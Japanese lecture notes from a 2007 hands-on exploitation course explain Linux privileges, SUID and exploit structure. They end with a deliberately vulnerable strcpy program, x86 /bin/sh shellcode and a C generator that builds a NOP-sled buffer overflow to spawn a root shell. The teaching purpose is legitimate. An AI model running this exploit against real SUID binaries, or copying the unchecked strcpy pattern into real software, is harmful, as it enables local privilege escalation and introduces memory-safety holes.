Exploiting実習　第1回

• 日時：2007-07-28
• 担当：Defolos

目次

• ハッキングの目的
• Linuxにおける権限
• シェルの役割
• シェルを起動するプログラム
• SUID
• なぜSUIDが危険か
• SUIDと起動させたシェル権限の確認
• exploitの構造
• ペイロードとアセンブリ
• 挿入ベクターについて
• 実例と体験
• 次回の予定

ハッキングの目的

• ここでのハッキングとはサーバなどのコンピュータに侵入すること
• 侵入＝コンピュータのコントロール権を奪うこと
• コントロール権はシステム内の権限
• 権限を取得することがシステムへの侵入
• 侵入のための具体的手法のひとつがexploiting
• exploitingにはローカルexploitingとリモートexploitingがある

Linuxにおける権限

一般的にLinuxには２つの権限がある

1. 一般ユーザ権限...制限のあるコンピュータ利用者
2. root権限...ありとあらゆる権限を持った、コンピュータ内の神様

ハッキングの目的は神様の権限であるroot権限をいただくこと

例:ユーザの削除

　一般ユーザは権限がないので他のユーザを勝手に消すことはできない

bash-2.05$ deluser tester

deluser: tester: User could not be removed from /etc/passwd

　一方、root権限であればユーザを消すのも自由。まさに神様。

シェルの役割

シェルはユーザとコンピュータの橋渡しをしてくれるソフトウェア

• 人基準の命令を変換してコンピュータに伝える
• コンピュータの出した結果を人に分かりやすく表示
• 命令を伝えるインタフェース

シェルとはユーザがパソコンを操作するハンドルのようなもの
Windowsの場合はマウスを使ったりとグラフィックなシェルを用いているが、Linuxでは文字だけで操作するシェルが主流

図1:Windowsにおけるグラフィカルシェル

図2:Linuxにおけるコマンドラインシェル

シェルを起動できれば命令をコンピュータに伝えることができる

例題 1.1

シェルを起動してみよう
シェルはプログラムとして実装されているので、シェルの中からシェルを起動することができる
シェルは/bin/に何種類か格納されている。それぞれのシェルには一長一短があるが、最も単純なshを起動する。

defolos@glazheim:~$ /bin/sh

sh-2.05b$

シェルの持つ権限は、シェルを起動したアカウントの権限に依存する。上記だと一般ユーザがシェルを起動したので、起動したシェルも一般権限しか持ってない

root@glazheim:~# /bin/sh

sh-2.05b#

rootがシェルを起動すると、起動したシェルもroot権限で起動する。

シェルを起動するプログラム

シェルもプログラムなので、プログラム内から呼び出すことができる

例題 1.2

Cではプログラムを呼び出す関数はexecl

#include <unistd.h>
int execl(const char *path, const char *arg, ...); 

SUID

プログラムの起動時に一時的にroot権限を得られる設定

パスワードファイルは一般ユーザに書き換えられたら困る
しかし、変更するつどrootに変更を頼むのは大変

passwdというプログラムは起動されると一時的にroot権限を与えられるのでパスワードファイルを書き換えられる

これを実現するのがSUIDという仕組み
実行ファイルごとに設定することができる

例題 1.3

SUIDを確認してみよう

lsコマンドの詳細表示オプションで確認できる

SUIDは危ないことが認識されているので最近はほとんど使われなくなった

なぜSUIDが危険か

• 起動されるシェルの権限は起動する前の権限に依存
• SUIDは起動時には、だれが実行したかに関わらずプログラムの所有者の権限を与える
• もしroot所有のSUIDプログラムの途中でシェルが起動されたら...

ハッキングではこのようなプログラムの流れを、さまざまな手法で変更し、シェルを起動することで権限を奪う

SUIDと起動させたシェル権限の確認

例題 1.4

例題1.2で作成したプログラムにSUIDビットを設定、所有者をrootにする。その状態で一般ユーザ権限からシェルを起動させてみよう

[参考]

SUIDを設定するには次のようにする

glazheim:/home/defolos# chown root shtest.exe
glazheim:/home/defolos# chmod +s shtest.exe

exploitの構造

2つの部分に分けられる

1. 挿入ベクター
2. ペイロード

軍隊用語からの転用

• ベクター...物資を運ぶための手段（トラック、輸送船など）
• ペイロード...輸送の目的物（食料、弾薬などの物資）
• ロジスティック...物資を前衛に輸送すること

ベクターはコンピュータのセキュリティを打ち破り、ペイロードを実行する。ペイロードには侵入するシステム内で行いたい処理を格納する。これを行うことをexploitingと言う。

ペイロードとアセンブリ

ペイロードの作成はアセンブリで行うのが一般的

• ペイロードは機械語でしか記述できない
• コンパイルすればCで書いても機械語にはできるが...
• ペイロードの処理内容はハードウェアに近くCでは対処しにくい
• サイズの制約がきついのでCで書くと大きくなり過ぎる
• より細かい処理を指定でき、サイズも小さくできるアセンブリが有効

挿入ベクターについて

挿入ベクターはC言語でも記述可能

• プログラムの流れを変更するためのプログラム
• ペイロードを実行するように流れを変える
• ベクターの特性によってバッファオーバフローやフォーマットストリング攻撃などの攻撃手法を分類する

実例と体験

流れを変えるべきプログラム

#include <stdio.h>
#include <string.h>

unsigned long sp (void){
        __asm__("movl %esp, %eax");
}

int main (int argc, char *argv[]){
        char buffer[500];
        long esp;

        esp = sp();

        strcpy (buffer, argv[1]);
        return 0;
}

ペイロード

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"

挿入ベクター生成プログラム

#include <stdlib.h>

char shellcode[]=
"ペイロード";

unsigned long sp (void){
        __asm__("movl %esp, %eax");
}

int main (int argc, char *argv[]){
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;

        offset = 0;
        esp = sp();
        ret = esp - offset;

        buffer = malloc(600);

        ptr = buffer;
        addr_ptr = (long *)ptr;
        for (i=0; i<600; i += 4)
                *(addr_ptr++) = ret;

        for (i=0; i<200; i++)
                buffer[i] = '\x90';

        ptr = buffer + 200;
        for (i=0; i<strlen(shellcode); i++)
                *(ptr++) = shellcode[i];

        buffer[600 - 1] = 0;

        execl("./bo-test.exe", "bo-test.exe", buffer, 0);

        free(buffer);
        return 0;
}

次回の予定

• ペイロードの作成について
• アセンブリの復習
• HelloWorldの作成と機械語への変換
• ペイロード化に伴ういくつかのテクニック
• 作成したペイロードのテスト